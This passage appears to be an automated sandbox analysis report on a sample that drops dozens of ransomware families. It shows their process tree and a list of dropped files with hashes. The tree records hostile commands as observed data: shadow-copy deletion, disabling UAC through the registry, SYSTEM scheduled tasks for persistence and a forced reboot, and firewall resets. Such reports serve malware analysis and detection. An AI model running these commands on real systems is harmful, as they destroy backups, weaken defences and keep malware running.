                                                                                                                                                          9⤵
                                                                                                                                                            PID:4976
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /c schtasks /Delete /F /TN rhaegal
                                                                                                                                                              10⤵
                                                                                                                                                                PID:3756
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /Delete /F /TN rhaegal
                                                                                                                                                                  11⤵
                                                                                                                                                                    PID:20696
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 546530533 && exit"
                                                                                                                                                                  10⤵
                                                                                                                                                                    PID:6376
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 546530533 && exit"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                      PID:20676
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 06:32:00
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:6944
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 06:32:00
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                        PID:23116
                                                                                                                                                                    • C:\Windows\8B8B.tmp
                                                                                                                                                                      "C:\Windows\8B8B.tmp" \\.\pipe\{536AFAD6-2757-45FC-9F6E-D898D0C73760}
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:25216
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Birele.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Birele.exe"
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:2112
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /F /IM explorer.exe
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:4076
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cerber5.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cerber5.exe"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:5300
                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                          C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                          PID:6968
                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                          C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                                          PID:20764
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\CoronaVirus.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\CoronaVirus.exe"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:1932
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe"
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:4592
                                                                                                                                                                              • C:\Windows\system32\mode.com
                                                                                                                                                                                mode con cp select=1251
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:18372
                                                                                                                                                                              • C:\Windows\System32\mshta.exe
                                                                                                                                                                                "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:21984
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\CryptoLocker.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\CryptoLocker.exe"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5412
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\CryptoLocker.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\CryptoLocker.exe" /w00000110
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:4760
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\CryptoWall.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\CryptoWall.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:5688
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:1224
                                                                                                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                            -k netsvcs
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:6228
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\DeriaLock.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\DeriaLock.exe"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:5796
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Dharma.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Dharma.exe"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:5236
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\ac\mssql2.exe"
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:14316
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Fantom.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Fantom.exe"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:2708
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\GandCrab.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\GandCrab.exe"
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:2172
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\InfinityCrypt.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\InfinityCrypt.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:1000
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Krotten.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Krotten.exe"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:5792
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\NoMoreRansom.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\NoMoreRansom.exe"
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:5608
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\NotPetya.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\NotPetya.exe"
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:1048
                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" C:\Windows\perfc.dat #1
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:23928
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1C42.tmp
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1C42.tmp" \\.\pipe\{8543A895-BE4F-44FA-8131-D7B06D213863}
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                    PID:24336
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Petya.A.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Petya.A.exe"
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:16472
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Bezilom.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Bezilom.exe"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:8644
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4984
                                                                                                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x3cc 0x33c
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                        PID:1216
                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4404 -ip 4404
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:316
                                                                                                                                                                                                        • C:\Windows\System32\vssadmin.exe
                                                                                                                                                                                                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Interacts with shadow copies
                                                                                                                                                                                                          PID:2760
                                                                                                                                                                                                        • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                          C:\Windows\system32\AUDIODG.EXE 0x3cc 0x33c
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:3856
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1856 -ip 1856
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6056
                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5516
                                                                                                                                                                                                                • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                  werfault.exe /hc /shared Global\0ddd9e0c7a3b444b91698a8d75cbdb2a /t 4044 /p 4008
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:4288
                                                                                                                                                                                                                  • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                    C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:25452
                                                                                                                                                                                                                    • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                      "LogonUI.exe" /flags:0x4 /state0:0xa38d5855 /state1:0x41c64e6d
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:22508
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\ddraw32.dll
                                                                                                                                                                                                                        C:\Windows\system32\ddraw32.dll :C:\Users\Admin\AppData\Roaming\Bumerang.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:13824
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                                          PID:15412
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Modifies registry key
                                                                                                                                                                                                                          PID:15428

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe.id-437B3C4D.[[email protected]].ncov

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2.9MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ef3d2198c5d2357d260278a8b881f025

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          644007397dbd764521c5daf34d51e19b7f10a212

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          8a1f3cea434a9738a035d24bfad3ca8b305e77460914a5e181560cbcbc7a701c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1702d52640ac4eac9ed091028aba9a6afe585136b5724ef653233a3d65690d1ed14cdb2ff50ab762d7b61d967e4e39f05becc61bc9204eca410909a014b987ba

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          207ed2c751a8ea02d2535e4abe0f163b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          2ba00f359bc5c7c5753eb0cd9032a7572524d873

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          432497f78207aa7e18b5c09fbb36a32f609ec2205f7e1c43d980295485628c4a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8a96a3c612fe16fe16ce459eb69fd4ce5539ca58f8fcd29d1fdd251028770cf027b78bce696f83ad0b0fb056dd750a5ae8716ea7a335c9dc1c83bd450ab0f773

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          661739d384d9dfd807a089721202900b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7050d5ae8acfbe560fa11073fef8185d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          5bc38e77ff06785fe0aec5a345c4ccd15752560e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f8d49a4af7a844bfc7247d5670def557

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          26ae0ce194a77a7a1887cf93741293fdfa6c94c4

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          61c60aa2e781a7f6ab54577db26d1be6ca3bf40c4c1d29eca48698e8cb5e1a2b

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          9e034173b20c85fc63ec88d045ace936af567e52caafe5e5735cf6fd5e72d040b992b38c0490ee9d9e43f6f934695d5913bc7a0c682b36c99e5e2d9923c24a9c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          944B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          ba169f4dcbbf147fe78ef0061a95e83b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IIMm.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          226KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          755a03d44114f63156efcf4746506054

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b8a4c205715e1a75492bb53cb92c27cf5d640518

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          35308a775af9579c7a6e57d88c9097ed366f8f1f7319e793a0e08ffb0e15ac4f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          963e556f1d144449dc4811f1dacf4611388ac726500c4abbd475f8f8751457fe449c006acd351dee8ce106d1cf5093b0fd4128c027b83e43525ac11898811490

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\QYIE.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          327KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          236ce3ef74eb14590d6a4fa2e4b7ac55

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          873f9f42571909bbf93778b19ae562006f93d682

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          bee6611ee5fd9fd21932e9d439808ba864c28d661127607fb7db2b55e810a625

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b2180bd9117b089d01786d1042ab480417084a13e7d79368d72a686201f01be0bd940dba75bde936f9ca909c982bfb6dc2f13f6d37facdfebebf7da29dc5a87d

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmrro5bm.inq.ps1

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          60B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ac\nc123.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          125KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          597de376b1f80c06d501415dd973dcec

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          629c9649ced38fd815124221b80c9d9c59a85e74

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lkqazl.bat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          726KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5f14117f1fd87fa46fb37b56e87f0e7f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          50a2950aaad34258933cf10f78195b61f870ee7d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e4a9f2d41890743f9447638f1af46aa2cc6f6025846df8e32915de8fcd9ab1ae

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          1ee17349daf18ed02a3cb3b67d8987a0bd7287ffe2bb2c0cf5ad5004a14c5e73de847f75a6390d24f1d1ccd619ae63d177a9c218fd4bc4b9f8ddadb105c890a0

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\okcsgUoo.bat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          112B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bae1095f340720d965898063fede1273

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          455d8a81818a7e82b1490c949b32fa7ff98d5210

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\riwebt.mp4

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          66ba4fe3713b9ad35929af1e5d4e0d93

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          e4eb6432fecff50a449d78222ef090c817707a3b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          60d977b34b70f7e923d5630e5078e41a9731388011c5de97ba466f6580c2629a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          f0bff1b162459f85594d3ecabc4d6952de1c9bee01b43d13ab82d831a5e9e815f528e69cc2757a593b8114d6c8f4c71633871a49d08ea216732f321cda3c4bd9

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\$uckyLocker.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          414KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          c850f942ccf6e45230169cc4bd9eb5c8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          51c647e2b150e781bd1910cac4061a2cee1daf89

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          86e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2b3890241b8c8690aab0aed347daa778aba20f29f76e8b79b02953b6252324317520b91ea60d3ef73e42ad403f7a6e0e3f2a057799f21ed447dae7096b2f47d9

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7ev3n.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          315KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          9f8bc96c96d43ecb69f883388d228754

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          61ed25a706afa2f6684bb4d64f69c5fb29d20953

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\@[email protected]

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          933B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7a2726bb6e6a79fb1d092b7f2b688af0

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          b3effadce8b76aee8cd6ce2eccbb8701797468a2

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\@[email protected]

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7bf2b57f2a205768755c07f238fb32cc

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          45356a9dd616ed7161a3b9192e2f318d0ab5ad10

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Annabelle.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          15.9MB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          0f743287c9911b4b1c726c7c7edcaf7d

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          9760579e73095455fcbaddfe1e7e98a2bb28bfe0

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          716335ba5cd1e7186c40295b199190e2b6655e48f1c1cbe12139ba67faa5e1ac

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          2a6dd6288303700ef9cb06ae1efeb1e121c89c97708e5ecd15ed9b2a35d0ecff03d8da58b30daeadad89bd38dc4649521ada149fb457408e5a2bdf1512f88677

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Avoid.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          248KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          20d2c71d6d9daf4499ffc4a5d164f1c3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          38e5dcd93f25386d05a34a5b26d3fba1bf02f7c8

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          3ac8cc58dcbceaec3dab046aea050357e0e2248d30b0804c738c9a5b037c220d

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8ffd56fb3538eb60da2dde9e3d6eee0dac8419c61532e9127f47c4351b6e53e01143af92b2e26b521e23cdbbf15d7a358d3757431e572e37a1eede57c7d39704

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\BadRabbit.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          431KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          fbbdc39af1139aebba4da004475e8839

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          de5c8d858e6e41da715dca1c019df0bfb92d32c0

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          74eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Birele.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          116KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          41789c704a0eecfdd0048b4b4193e752

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          fb1e8385691fa3293b7cbfb9b2656cf09f20e722

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b2dcfdf9e7b09f2aa5004668370e77982963ace820e7285b2e264a294441da23

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          76391ac85fdc3be75441fcd6e19bed08b807d3946c7281c647f16a3be5388f7be307e6323fac8502430a4a6d800d52a88709592a49011ecc89de4f19102435ea

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Bumerang.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          26KB

                                                                                                                                                                                                                          MD5
